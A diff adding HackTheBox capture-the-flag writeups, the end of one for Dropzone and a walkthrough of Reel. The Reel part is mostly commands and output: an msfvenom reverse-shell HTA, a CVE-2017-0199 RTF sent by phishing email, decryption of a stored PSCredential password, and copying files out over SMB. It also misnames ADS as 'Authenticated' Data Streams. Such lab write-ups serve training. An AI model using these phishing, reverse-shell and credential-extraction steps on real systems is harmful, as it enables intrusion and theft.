+ type "C:\Docume~1\Admini~1\Desktop\flags\2 for the price of 1!.txt"
+ For limited time only!
+
+ Keep an eye on our **ADS** for new offers & discounts!
+
+
+And from here we see that root.txt isn't there, but in the flags directory we are hinted at ADS which stands for Authenticated Data Streams, however Windows XP does not have a method to view ADS natively, so that means we're going to download the required binary [here](https://docs.microsoft.com/en-us/sysinternals/downloads/streams):
+
+
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/19 ] [_HTB/Dropzone/psexec]
+ → wget https://download.sysinternals.com/files/Streams.zip
+ --2020-12-21 11:22:51-- https://download.sysinternals.com/files/Streams.zip
+ Resolving download.sysinternals.com (download.sysinternals.com)... 152.199.19.160
+ Connecting to download.sysinternals.com (download.sysinternals.com)|152.199.19.160|:443... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 511505 (500K) [application/octet-stream]
+ Saving to: ‘Streams.zip’
+
+ Streams.zip 100%[===========================================================>] 499.52K --.-KB/s in 0.09s
+
+ 2020-12-21 11:22:52 (5.67 MB/s) - ‘Streams.zip’ saved [511505/511505]
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/19 ] [_HTB/Dropzone/psexec]
+ → unzip Streams.zip
+ Archive: Streams.zip
+ inflating: streams.exe
+ inflating: streams64.exe
+ inflating: streams64a.exe
+ inflating: Eula.txt
+
+ [ 10.10.14.6/23 ] [ /dev/pts/19 ] [_HTB/Dropzone/psexec]
+ → file streams.exe
+ streams.exe: PE32 executable (console) Intel 80386, for MS Windows
+
+
+
+So here we're going to send the 32 bit executable obviously, and we're putting it in /windows/system32/ to avoid the need to type the absolute path everytime:
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/19 ] [_HTB/Dropzone/psexec]
+ → file streams.exe
+ streams.exe: PE32 executable (console) Intel 80386, for MS Windows
+
+ [ 10.10.14.6/23 ] [ /dev/pts/19 ] [_HTB/Dropzone/psexec]
+ → tftp 10.10.10.90
+ tftp> mode binary
+ tftp> put streams.exe /windows/system32/streams.exe
+ Sent 342392 bytes in 30.2 seconds
+
+
+
+
+ cd C:\docume~1\administrator\desktop\flags\
+ streams -accepteula
+ streams 2*
+
+
+
+And there we have it!
+
+
+
+And that's it ! we have been able to get both flags for this box.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
diff --git a/Hard/11.md b/Hard/11.md
new file mode 100644
index 0000000..3a45bb9
--- /dev/null
+++ b/Hard/11.md
@@ -0,0 +1,868 @@
+# Reel Writeup
+
+
+
+## Introduction :
+
+Reel is a hard windows box released back in June 2018.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
+
+
+ [ 10.10.14.16/23 ] [ /dev/pts/2 ] [~]
+ → sudo nmap -vvv -sTU -p- 10.10.10.77 --max-retries 0 -Pn --min-rate=500 | grep Discovered
+ [sudo] password for nothing:
+ Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
+ Discovered open port 135/tcp on 10.10.10.77
+ Discovered open port 21/tcp on 10.10.10.77
+ Discovered open port 22/tcp on 10.10.10.77
+ Discovered open port 139/tcp on 10.10.10.77
+ Discovered open port 25/tcp on 10.10.10.77
+ Discovered open port 445/tcp on 10.10.10.77
+ Discovered open port 49159/tcp on 10.10.10.77
+ Discovered open port 593/tcp on 10.10.10.77
+
+
+
+Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.16/23 ] [ /dev/pts/2 ] [~]
+ → sudo nmap -sCV -p21,22,139,25,445,593,49159 10.10.10.77
+ Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-12 17:16 CET
+ Nmap scan report for 10.10.10.77
+ Host is up (0.035s latency).
+
+ PORT STATE SERVICE VERSION
+ 21/tcp open ftp Microsoft ftpd
+ | ftp-anon: Anonymous FTP login allowed (FTP code 230)
+ |_05-28-18 11:19PM <****DIR> documents
+ | ftp-syst:
+ |_ SYST: Windows_NT
+ 22/tcp open ssh OpenSSH 7.6 (protocol 2.0)
+ | ssh-hostkey:
+ | 2048 82:20:c3:bd:16:cb:a2:9c:88:87:1d:6c:15:59:ed:ed (RSA)
+ | 256 23:2b:b8:0a:8c:1c:f4:4d:8d:7e:5e:64:58:80:33:45 (ECDSA)
+ |_ 256 ac:8b:de:25:1d:b7:d8:38:38:9b:9c:16:bf:f6:3f:ed (ED25519)
+ 25/tcp open smtp?
+ | fingerprint-strings:
+ | DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, X11Probe:
+ | 220 Mail Service ready
+ | FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, RTSPRequest:
+ | 220 Mail Service ready
+ | sequence of commands
+ | sequence of commands
+ | Hello:
+ | 220 Mail Service ready
+ | EHLO Invalid domain address.
+ | Help:
+ | 220 Mail Service ready
+ | DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
+ | SIPOptions:
+ | 220 Mail Service ready
+ | sequence of commands
+ | sequence of commands
+ | sequence of commands
+ | sequence of commands
+ | sequence of commands
+ | sequence of commands
+ | sequence of commands
+ | sequence of commands
+ | sequence of commands
+ | sequence of commands
+ | sequence of commands
+ | TerminalServerCookie:
+ | 220 Mail Service ready
+ |_ sequence of commands
+ | smtp-commands: REEL, SIZE 20480000, AUTH LOGIN PLAIN, HELP,
+ |_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
+ 139/tcp open netbios-ssn Microsoft Windows netbios-ssn
+ 445/tcp open microsoft-ds Windows Server 2012 R2 Standard 9600 microsoft-ds (workgroup: HTB)
+ 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
+ 49159/tcp open msrpc Microsoft Windows RPC
+ 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
+ SF-Port25-TCP:V=7.91%I=7%D=1/12%Time=5FFDCB73%P=x86_64-pc-linux-gnu%r(NULL
+ SF:,18,"220\x20Mail\x20Service\x20ready\r\n")%r(Hello,3A,"220\x20Mail\x20S
+ SF:ervice\x20ready\r\n501\x20EHLO\x20Invalid\x20domain\x20address\.\r\n")%
+ SF:r(Help,54,"220\x20Mail\x20Service\x20ready\r\n211\x20DATA\x20HELO\x20EH
+ SF:LO\x20MAIL\x20NOOP\x20QUIT\x20RCPT\x20RSET\x20SAML\x20TURN\x20VRFY\r\n"
+ SF:)%r(GenericLines,54,"220\x20Mail\x20Service\x20ready\r\n503\x20Bad\x20s
+ SF:equence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20commands\r
+ SF:\n")%r(GetRequest,54,"220\x20Mail\x20Service\x20ready\r\n503\x20Bad\x20
+ SF:sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20commands\
+ SF:r\n")%r(HTTPOptions,54,"220\x20Mail\x20Service\x20ready\r\n503\x20Bad\x
+ SF:20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20command
+ SF:s\r\n")%r(RTSPRequest,54,"220\x20Mail\x20Service\x20ready\r\n503\x20Bad
+ SF:\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20comma
+ SF:nds\r\n")%r(RPCCheck,18,"220\x20Mail\x20Service\x20ready\r\n")%r(DNSVer
+ SF:sionBindReqTCP,18,"220\x20Mail\x20Service\x20ready\r\n")%r(DNSStatusReq
+ SF:uestTCP,18,"220\x20Mail\x20Service\x20ready\r\n")%r(SSLSessionReq,18,"2
+ SF:20\x20Mail\x20Service\x20ready\r\n")%r(TerminalServerCookie,36,"220\x20
+ SF:Mail\x20Service\x20ready\r\n503\x20Bad\x20sequence\x20of\x20commands\r\
+ SF:n")%r(TLSSessionReq,18,"220\x20Mail\x20Service\x20ready\r\n")%r(Kerbero
+ SF:s,18,"220\x20Mail\x20Service\x20ready\r\n")%r(SMBProgNeg,18,"220\x20Mai
+ SF:l\x20Service\x20ready\r\n")%r(X11Probe,18,"220\x20Mail\x20Service\x20re
+ SF:ady\r\n")%r(FourOhFourRequest,54,"220\x20Mail\x20Service\x20ready\r\n50
+ SF:3\x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\
+ SF:x20commands\r\n")%r(LPDString,18,"220\x20Mail\x20Service\x20ready\r\n")
+ SF:%r(LDAPSearchReq,18,"220\x20Mail\x20Service\x20ready\r\n")%r(LDAPBindRe
+ SF:q,18,"220\x20Mail\x20Service\x20ready\r\n")%r(SIPOptions,162,"220\x20Ma
+ SF:il\x20Service\x20ready\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n5
+ SF:03\x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of
+ SF:\x20commands\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\
+ SF:x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20comman
+ SF:ds\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequenc
+ SF:e\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n503\
+ SF:x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x2
+ SF:0commands\r\n");
+ Service Info: Host: REEL; OS: Windows; CPE: cpe:/o:microsoft:windows
+
+ Host script results:
+ |_clock-skew: mean: -1s, deviation: 1s, median: -2s
+ | smb-os-discovery:
+ | OS: Windows Server 2012 R2 Standard 9600 (Windows Server 2012 R2 Standard 6.3)
+ | OS CPE: cpe:/o:microsoft:windows_server_2012::-
+ | Computer name: REEL
+ | NetBIOS computer name: REEL\x00
+ | Domain name: HTB.LOCAL
+ | Forest name: HTB.LOCAL
+ | FQDN: REEL.HTB.LOCAL
+ |_ System time: 2021-01-12T16:19:31+00:00
+ | smb-security-mode:
+ | account_used: <****blank>
+ | authentication_level: user
+ | challenge_response: supported
+ |_ message_signing: required
+ | smb2-security-mode:
+ | 2.02:
+ |_ Message signing enabled and required
+ | smb2-time:
+ | date: 2021-01-12T16:19:32
+ |_ start_date: 2021-01-12T16:10:40
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 206.48 seconds
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up port 21 so let's investigate it:
+
+
+ [ 10.10.14.16/23 ] [ /dev/pts/1 ] [~]
+ → ftp 10.10.10.77
+ Connected to 10.10.10.77.
+ 220 Microsoft FTP Service
+ Name (10.10.10.77:nothing): anonymous
+ 331 Anonymous access allowed, send identity (e-mail name) as password.
+ Password:
+ 230 User logged in.
+ Remote system type is Windows_NT.
+ ftp> dir
+ 200 PORT command successful.
+ 125 Data connection already open; Transfer starting.
+ 05-28-18 11:19PM <****DIR> documents
+ 226 Transfer complete.
+ ftp> cd documents
+ 250 CWD command successful.
+ ftp> dir
+ 200 PORT command successful.
+ 125 Data connection already open; Transfer starting.
+ 05-28-18 11:19PM 2047 AppLocker.docx
+ 05-28-18 01:01PM 124 readme.txt
+ 10-31-17 09:13PM 14581 Windows Event Forwarding.docx
+ 226 Transfer complete.
+ ftp> mget *
+ mget AppLocker.docx?
+ 200 PORT command successful.
+ 125 Data connection already open; Transfer starting.
+ WARNING! 9 bare linefeeds received in ASCII mode
+ File may not have transferred correctly.
+ 226 Transfer complete.
+ 2047 bytes received in 0.03 secs (63.6166 kB/s)
+ mget readme.txt?
+ 200 PORT command successful.
+ 125 Data connection already open; Transfer starting.
+ 226 Transfer complete.
+ 124 bytes received in 0.03 secs (3.6738 kB/s)
+ mget Windows Event Forwarding.docx?
+ 200 PORT command successful.
+ 125 Data connection already open; Transfer starting.
+ WARNING! 51 bare linefeeds received in ASCII mode
+ File may not have transferred correctly.
+ 226 Transfer complete.
+ 14581 bytes received in 0.07 secs (200.3977 kB/s)
+ ftp> ^C
+ ftp> exit
+ 221 Goodbye.
+
+
+ [ 10.10.14.16/23 ] [ /dev/pts/1 ] [~/_HTB/reel]
+ → l
+ total 32K
+ drwxr-xr-x 2 nothing nothing 4.0K Jan 12 17:29 .
+ drwxr-xr-x 3 nothing nothing 4.0K Jan 12 17:29 ..
+ -rw-r--r-- 1 nothing nothing 2.0K Jan 12 17:27 AppLocker.docx
+ -rw-r--r-- 1 nothing nothing 122 Jan 12 17:27 readme.txt
+ -rw-r--r-- 1 nothing nothing 15K Jan 12 17:27 'Windows Event Forwarding.docx'
+
+ [ 10.10.14.16/23 ] [ /dev/pts/1 ] [~/_HTB/reel]
+ → cat readme.txt
+ please email me any rtf format procedures - I'll review and convert.
+
+ new format / converted documents will be saved here.%
+
+
+
+Let's use exiftool to check out the metadata of these files since readme didn't give us anything specific:
+
+
+ [ 10.10.14.16/23 ] [ /dev/pts/1 ] [~/_HTB/reel]
+ → exiftool AppLocker.docx
+ ExifTool Version Number : 12.13
+ File Name : AppLocker.docx
+ Directory : .
+ File Size : 2047 bytes
+ File Modification Date/Time : 2021:01:12 17:27:13+01:00
+ File Access Date/Time : 2021:01:12 17:27:13+01:00
+ File Inode Change Date/Time : 2021:01:12 17:29:40+01:00
+ File Permissions : rw-r--r--
+ File Type : DOCX
+ File Type Extension : docx
+ MIME Type : application/vnd.openxmlformats-officedocument.wordprocessingml.document
+ Zip Required Version : 20
+ Zip Bit Flag : 0x0008
+ Zip Compression : Deflated
+ Zip Modify Date : 2018:05:29 00:19:50
+ Zip CRC : 0x3cdd8b4f
+ Zip Compressed Size : 166
+ Zip Uncompressed Size : 284
+ Zip File Name : _rels/.rels
+
+
+
+Not much in Applocker.docx, However in the last file we see a bit more useful infos:
+
+
+ [ 10.10.14.16/23 ] [ /dev/pts/1 ] [~/_HTB/reel]
+ → exiftool Windows\ Event\ Forwarding.docx
+ ExifTool Version Number : 12.13
+ File Name : Windows Event Forwarding.docx
+ Directory : .
+ File Size : 14 KiB
+ File Modification Date/Time : 2021:01:12 17:27:15+01:00
+ File Access Date/Time : 2021:01:12 17:31:26+01:00
+ File Inode Change Date/Time : 2021:01:12 17:29:48+01:00
+ File Permissions : rw-r--r--
+ File Type : DOCX
+ File Type Extension : docx
+ MIME Type : application/vnd.openxmlformats-officedocument.wordprocessingml.document
+ Zip Required Version : 20
+ Zip Bit Flag : 0x0006
+ Zip Compression : Deflated
+ Zip Modify Date : 1980:01:01 00:00:00
+ Zip CRC : 0x82872409
+ Zip Compressed Size : 385
+ Zip Uncompressed Size : 1422
+ Zip File Name : [Content_Types].xml
+ Creator : nico@megabank.com
+ Revision Number : 4
+ Create Date : 2017:10:31 18:42:00Z
+ Modify Date : 2017:10:31 18:51:00Z
+ Template : Normal.dotm
+ Total Edit Time : 5 minutes
+ Pages : 2
+ Words : 299
+ Characters : 1709
+ Application : Microsoft Office Word
+ Doc Security : None
+ Lines : 14
+ Paragraphs : 4
+ Scale Crop : No
+ Heading Pairs : Title, 1
+ Titles Of Parts :
+ Company :
+ Links Up To Date : No
+ Characters With Spaces : 2004
+ Shared Doc : No
+ Hyperlinks Changed : No
+ App Version : 14.0000
+
+
+
+For instance, this time we get a few more informations such as the username **nico** at the domain name **megabank.com** so let's add it to our hosts file:
+
+
+ [ 10.66.66.2/32 ] [ /dev/pts/4 ] [~/HTB/Reel]
+ → sudo -i
+ [sudo] password for nothing:
+ ┌──(root💀nowhere)-[~]
+ └─# echo '10.10.10.77 megabank.com' >> /etc/hosts
+
+ ┌──(root💀nowhere)-[~]
+ └─# ping -c1 megabank.com
+ PING megabank.com (10.10.10.77) 56(84) bytes of data.
+ 64 bytes from megabank.com (10.10.10.77): icmp_seq=1 ttl=127 time=450 ms
+
+ --- megabank.com ping statistics ---
+ 1 packets transmitted, 1 received, 0% packet loss, time 0ms
+ rtt min/avg/max/mdev = 450.267/450.267/450.267/0.000 ms
+
+ ┌──(root💀nowhere)-[~]
+ └─# exit
+
+ [ 10.66.66.2/32 ] [ /dev/pts/4 ] [~/HTB/Reel]
+ →
+
+
+
+So let's open up the docx document and see what's in it using libreoffice:
+
+
+
+However that's about it for ftp, now let's move on to that smtp port using telnet Which is where we need to send a malicious email which contains a malicious .rtf file as we got hinted to do earlier, to the nico user. We're going to use [CVE-2017-0199](https://www.exploit-db.com/exploits/41934) :
+
+First we generate the HTA file:
+
+
+ [ 10.10.16.9/23 ] [ /dev/pts/2 ] [~/HTB/Reel]
+ → msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.9 LPORT=9001 -f hta-psh -o msfv.hta
+ [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
+ [-] No arch selected, selecting arch: x86 from the payload
+ No encoder specified, outputting raw payload
+ Payload size: 324 bytes
+ Final size of hta-psh file: 7431 bytes
+ Saved as: msfv.hta
+
+ [term2]
+ [ 10.10.16.9/23 ] [ /dev/pts/14 ] [HTB/Reel/CVE-2017-0199]
+ → nc -lvnp 9001
+ listening on [any] 9001 ...
+
+
+
+Note that this msfv.hta file is going to trigger the reverse shell connection back to us on port **9001** so don't forget to have your netcat ready
+
+Then we generate the RTF file:
+
+
+ [ 10.10.16.9/23 ] [ /dev/pts/2 ] [~/HTB/Reel]
+ → git clone https://github.com/bhdresh/CVE-2017-0199
+ Cloning into 'CVE-2017-0199'...
+ remote: Enumerating objects: 298, done.
+ remote: Total 298 (delta 0), reused 0 (delta 0), pack-reused 298
+ Receiving objects: 100% (298/298), 288.09 KiB | 1.20 MiB/s, done.
+ Resolving deltas: 100% (102/102), done.
+
+ [ 10.10.16.9/23 ] [ /dev/pts/2 ] [~/HTB/Reel]
+ → cd CVE-2017-0199
+
+ [ 10.10.16.9/23 ] [ /dev/pts/2 ] [HTB/Reel/CVE-2017-0199]
+ → python2 cve-2017-0199_toolkit.py -M gen -w nihilist.rtf -u http://10.10.16.9/msfv.hta -t rtf -x 0
+ Generating normal RTF payload.
+
+ Generated nihilist.rtf successfully
+
+
+
+Note the **-u** parameter which is going to be the URL from which the box is going to get the **msfv.hta** file from, and next step is to send the phishing email with the **sendEmail** utility:
+
+
+ [term1]
+ [ 10.10.16.9/23 ] [ /dev/pts/16 ] [~/HTB/Reel]
+ → ls -lash msfv.hta; sudo python3 -m http.server 80
+ 8.0K -rw-r--r-- 1 nothing nothing 7.3K Dec 26 18:55 msfv.hta
+ Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
+
+ [term2]
+ [ 10.10.16.9/23 ] [ /dev/pts/2 ] [HTB/Reel/CVE-2017-0199]
+ → sendEmail -f nihilist@megabank.com -t nico@megabank.com -u "check the attached file" -m "very important mail" -a nihilist.rtf -s 10.129.179.102 -v
+ Dec 26 19:08:30 nowhere sendEmail[885036]: DEBUG => Connecting to 10.129.179.102:25
+ Dec 26 19:08:30 nowhere sendEmail[885036]: DEBUG => My IP address is: 10.10.16.9
+ Dec 26 19:08:30 nowhere sendEmail[885036]: SUCCESS => Received: 220 Mail Service ready
+ Dec 26 19:08:30 nowhere sendEmail[885036]: INFO => Sending: EHLO nowhere
+ Dec 26 19:08:30 nowhere sendEmail[885036]: SUCCESS => Received: 250-REEL, 250-SIZE 20480000, 250-AUTH LOGIN PLAIN, 250 HELP
+ Dec 26 19:08:30 nowhere sendEmail[885036]: INFO => Sending: MAIL FROM:<****nihilist@megabank.com>
+ Dec 26 19:08:30 nowhere sendEmail[885036]: SUCCESS => Received: 250 OK
+ Dec 26 19:08:30 nowhere sendEmail[885036]: INFO => Sending: RCPT TO: <****nico@megabank.com>
+ Dec 26 19:08:30 nowhere sendEmail[885036]: SUCCESS => Received: 250 OK
+ Dec 26 19:08:30 nowhere sendEmail[885036]: INFO => Sending: DATA
+ Dec 26 19:08:30 nowhere sendEmail[885036]: SUCCESS => Received: 354 OK, send.
+ Dec 26 19:08:30 nowhere sendEmail[885036]: INFO => Sending message body
+ Dec 26 19:08:30 nowhere sendEmail[885036]: Setting content-type: text/plain
+ Dec 26 19:08:30 nowhere sendEmail[885036]: DEBUG => Sending the attachment [nihilist.rtf]
+ Dec 26 19:08:43 nowhere sendEmail[885036]: SUCCESS => Received: 250 Queued (12.220 seconds)
+ Dec 26 19:08:43 nowhere sendEmail[885036]: Email was sent successfully! From: <****nihilist@megabank.com> To: <****nico@megabank.com> Subject: [check the attached file] Attachment(s): [nihilist.rtf] Server: [10.129.179.102:25]
+
+Then we need to wait a few minutes for nico to fall for the phishing attempt, and we get a shell:
+
+
+ [ 10.10.16.9/23 ] [ /dev/pts/14 ] [HTB/Reel/CVE-2017-0199]
+ → nc -lvnp 9001
+ listening on [any] 9001 ...
+ connect to [10.10.16.9] from (UNKNOWN) [10.129.179.102] 51538
+ Microsoft Windows [Version 6.3.9600]
+ (c) 2013 Microsoft Corporation. All rights reserved.
+
+ C:\Windows\system32>whoami
+ whoami
+ htb\nico
+
+
+
+And we got a reverse shell connection ! We are now logged in as the nico user, so let's see if we can get the user flag:
+
+
+ C:\Windows\system32>cd ../../
+ cd ../../
+
+ C:\>cd Users\
+ cd Users\
+
+ C:\Users>dir
+ dir
+ Volume in drive C has no label.
+ Volume Serial Number is CC8A-33E1
+
+ Directory of C:\Users
+
+ 03/11/2017 23:09 DIR> .
+ 03/11/2017 23:09 DIR> ..
+ 25/10/2017 20:48 DIR> .NET v2.0
+ 25/10/2017 20:48 DIR> .NET v2.0 Classic
+ 01/11/2017 21:58 DIR> .NET v4.5
+ 01/11/2017 21:58 DIR> .NET v4.5 Classic
+ 16/02/2018 23:29 DIR> Administrator
+ 04/11/2017 23:05 DIR> brad
+ 30/10/2017 23:00 DIR> claire
+ 25/10/2017 20:48 DIR> Classic .NET AppPool
+ 03/11/2017 23:09 DIR> herman
+ 31/10/2017 22:27 DIR> julia
+ 26/12/2021 12:30 DIR> nico
+ 22/08/2013 15:39 DIR> Public
+ 28/10/2017 21:32 DIR> SSHD
+ 16/11/2017 22:35 DIR> tom
+ 0 File(s) 0 bytes
+ 16 Dir(s) 15,739,142,144 bytes free
+
+ C:\Users>cd nico
+ cd nico
+
+ C:\Users\nico>cd desktop
+ cd desktop
+
+ C:\Users\nico\Desktop>type user.txt
+ type user.txt
+ faXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And we got the user flag!
+
+## **Part 3 : Getting Root Access**
+
+Now on nico's desktop we see the following:
+
+
+ C:\Users\nico\Desktop>dir
+ dir
+ Volume in drive C has no label.
+ Volume Serial Number is CC8A-33E1
+
+ Directory of C:\Users\nico\Desktop
+
+ 28/05/2018 20:07 DIR> .
+ 28/05/2018 20:07 DIR> ..
+ 27/10/2017 23:59 1,468 cred.xml
+ 27/10/2017 23:40 32 user.txt
+ 2 File(s) 1,500 bytes
+ 2 Dir(s) 15,739,027,456 bytes free
+
+ C:\Users\nico\Desktop>type cred.xml
+ type cred.xml
+ <****Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04"> <****Obj RefId="0"> <****TN RefId="0"> <****T>System.Management.Automation.PSCredential <****/T> <****T>System.Object <****/T> <****/TN> <****ToString>System.Management.Automation.PSCredential <****/ToString> <****Props> <****S N="UserName">HTB\Tom <****/S> <****SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e4a07bc7aaeade47925c42c8be5870730000000002000000000003660000c000000010000000d792a6f34a55235c22da98b0c041ce7b0000000004800000a00000001000000065d20f0b4ba5367e53498f0209a3319420000000d4769a161c2794e19fcefff3e9c763bb3a8790deebf51fc51062843b5d52e40214000000ac62dab09371dc4dbfd763fea92b9d5444748692 <****/SS> <****/Props> <****/Obj> <****/Objs>
+
+Here we see an output of the **Export-CliXml** command, which is this **cred.xml** file, we can get the password of tom out of it:
+
+
+ C:\Users\nico\Desktop>powershell -c "$cred = Import-CliXml -Path cred.xml; $cred.GetNetworkCredential() | Format-List *"
+ powershell -c "$cred = Import-CliXml -Path cred.xml; $cred.GetNetworkCredential() | Format-List *"
+
+
+ UserName : Tom
+ Password : **1ts-mag1c!!!**
+ SecurePassword : System.Security.SecureString
+ Domain : HTB
+
+
+
+And we have tom's password! Now let's ssh as the tom user using his password:
+
+
+ [ 10.10.16.9/23 ] [ /dev/pts/2 ] [~/HTB/Reel]
+ → ssh tom@megabank.com
+ The authenticity of host 'megabank.com (10.129.179.102)' can't be established.
+ ED25519 key fingerprint is SHA256:fIZnS9nEVF3o86fEm/EKspTgedBr8TvFR0i3Pzk40EQ.
+ This key is not known by any other names
+ Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
+ Warning: Permanently added 'megabank.com' (ED25519) to the list of known hosts.
+ tom@megabank.com's password:
+ Microsoft Windows [Version 6.3.9600]
+ (c) 2013 Microsoft Corporation. All rights reserved.
+
+ tom@REEL C:\Users\tom>whoami
+ htb\tom
+
+
+
+And we now have access to tom's system account! Let's take a look around:
+
+
+ tom@REEL C:\Users\tom>dir
+ Volume in drive C has no label.
+ Volume Serial Number is CC8A-33E1
+
+ Directory of C:\Users\tom
+
+ 11/16/2017 10:35 PM DIR> .
+ 11/16/2017 10:35 PM DIR> ..
+ 10/27/2017 11:38 PM DIR> Contacts
+ 05/29/2018 07:57 PM DIR> Desktop
+ 10/27/2017 11:38 PM DIR> Documents
+ 10/29/2017 09:08 PM DIR> Downloads
+ 10/27/2017 11:38 PM DIR> Favorites
+ 10/27/2017 11:38 PM DIR> Links
+ 10/27/2017 11:38 PM DIR> Music
+ 10/27/2017 11:38 PM DIR> Pictures
+ 10/27/2017 11:38 PM DIR> Saved Games
+ 10/27/2017 11:38 PM DIR> Searches
+ 10/27/2017 11:38 PM DIR> Videos
+ 0 File(s) 0 bytes
+ 13 Dir(s) 15,736,729,600 bytes free
+
+ tom@REEL C:\Users\tom>cd Desktop
+
+ tom@REEL C:\Users\tom\Desktop>dir
+ Volume in drive C has no label.
+ Volume Serial Number is CC8A-33E1
+
+ Directory of C:\Users\tom\Desktop
+
+ 05/29/2018 07:57 PM DIR> .
+ 05/29/2018 07:57 PM DIR> ..
+ 05/29/2018 08:02 PM DIR> AD Audit
+ 0 File(s) 0 bytes
+ 3 Dir(s) 15,736,729,600 bytes free
+
+ tom@REEL C:\Users\tom\Desktop>cd "AD Audit"
+
+ tom@REEL C:\Users\tom\Desktop\AD Audit>
+ tom@REEL C:\Users\tom\Desktop\AD Audit>dir
+ Volume in drive C has no label.
+ Volume Serial Number is CC8A-33E1
+
+ Directory of C:\Users\tom\Desktop\AD Audit
+
+ 05/29/2018 08:02 PM DIR> .
+ 05/29/2018 08:02 PM DIR> ..
+ 05/29/2018 11:44 PM DIR> BloodHound
+ 05/29/2018 08:02 PM 182 note.txt
+ 1 File(s) 182 bytes
+ 3 Dir(s) 15,736,729,600 bytes free
+
+ tom@REEL C:\Users\tom\Desktop\AD Audit>type note.txt
+ Findings:
+
+ Surprisingly no AD attack paths from user to Domain Admin (using default shortest path query).
+
+ Maybe we should re-run Cypher query against other groups we've created.
+
+
+Here we are hinted that there has been an AD audit, let's see if we have access to interesting bloodhound files:
+
+
+ tom@REEL C:\Users\tom\Desktop\AD Audit>cd BloodHound
+
+ tom@REEL C:\Users\tom\Desktop\AD Audit\BloodHound>dir
+ Volume in drive C has no label.
+ Volume Serial Number is CC8A-33E1
+
+ Directory of C:\Users\tom\Desktop\AD Audit\BloodHound
+
+ 05/29/2018 11:44 PM DIR> .
+ 05/29/2018 11:44 PM DIR> ..
+ 05/29/2018 07:57 PM DIR> Ingestors
+ 10/30/2017 10:15 PM 769,587 PowerView.ps1
+ 1 File(s) 769,587 bytes
+ 3 Dir(s) 15,736,729,600 bytes free
+
+ tom@REEL C:\Users\tom\Desktop\AD Audit\BloodHound>cd Ingestors
+
+ tom@REEL C:\Users\tom\Desktop\AD Audit\BloodHound\Ingestors>dir
+ Volume in drive C has no label.
+ Volume Serial Number is CC8A-33E1
+
+ Directory of C:\Users\tom\Desktop\AD Audit\BloodHound\Ingestors
+
+ 05/29/2018 07:57 PM DIR> .
+ 05/29/2018 07:57 PM DIR> ..
+ 11/16/2017 11:50 PM 112,225 acls.csv
+ 10/28/2017 08:50 PM 3,549 BloodHound.bin
+ 10/24/2017 03:27 PM 246,489 BloodHound_Old.ps1
+ 10/24/2017 03:27 PM 568,832 SharpHound.exe
+ 10/24/2017 03:27 PM 636,959 SharpHound.ps1
+ 5 File(s) 1,568,054 bytes
+ 2 Dir(s) 15,736,729,600 bytes free
+
+
+
+So let's transfer the bloodhound files back to our local machine:
+
+
+ [term 1]
+ [ 10.10.16.9/23 ] [ /dev/pts/14 ] [~/HTB/Reel]
+ → impacket-smbserver -smb2support nihilist .
+ Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
+
+ [*] Config file parsed
+ [*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
+ [*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
+ [*] Config file parsed
+ [*] Config file parsed
+ [*] Config file parsed
+
+ [term 2]
+ tom@REEL C:\Users\tom\Desktop\AD Audit\BloodHound\Ingestors>copy * \\10.10.16.9\nihilist\
+ acls.csv
+ BloodHound.bin
+ BloodHound_Old.ps1
+ SharpHound.exe
+ SharpHound.ps1
+ 5 file(s) copied.
+
+ [term 1]
+ [*] Incoming connection (10.129.179.102,61795)
+ [*] AUTHENTICATE_MESSAGE (HTB\tom,REEL)
+ [*] User REEL\tom authenticated successfully
